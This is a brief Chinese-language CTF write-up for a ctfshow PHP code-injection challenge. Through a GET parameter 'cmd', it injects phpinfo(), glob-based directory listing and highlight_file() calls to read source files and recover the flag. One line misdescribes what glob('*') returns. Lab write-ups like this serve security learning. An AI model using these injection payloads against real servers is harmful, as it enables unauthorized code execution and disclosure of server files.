打开靶机,f12
发现有提示hit:cmd=
所以有个get传递的参数,变量为cmd
利用phpinfo();函数看一下php配置文件
?cmd=phpinfo();
可以看见版本信息这些
然后看一下当前目录下有哪些文件:
?cmd=print_r(glob("*"));
print_r(glob("*")):直接打印出来当前目录下的所有文件
print_r(glob("*")):直接打印出来当前目录下的所有txt文件
Array ( [0] => 903c00105c0141fd37ff47697e916e53616e33a72fb3774ab213b3e2a732f56f.php [1] => index.php )
发现有两个文件,我们先查看一下index.php应该是源码:
?cmd=highlight_file("index.php");
为get传递参数,变量为cmd
查看另外一个文件
?cmd=highlight_file("903c00105c0141fd37ff47697e916e53616e33a72fb3774ab213b3e2a732f56f.php");
得到flag:
ctfshow{c823107a-3337-439d-868a-276abe71e5f2}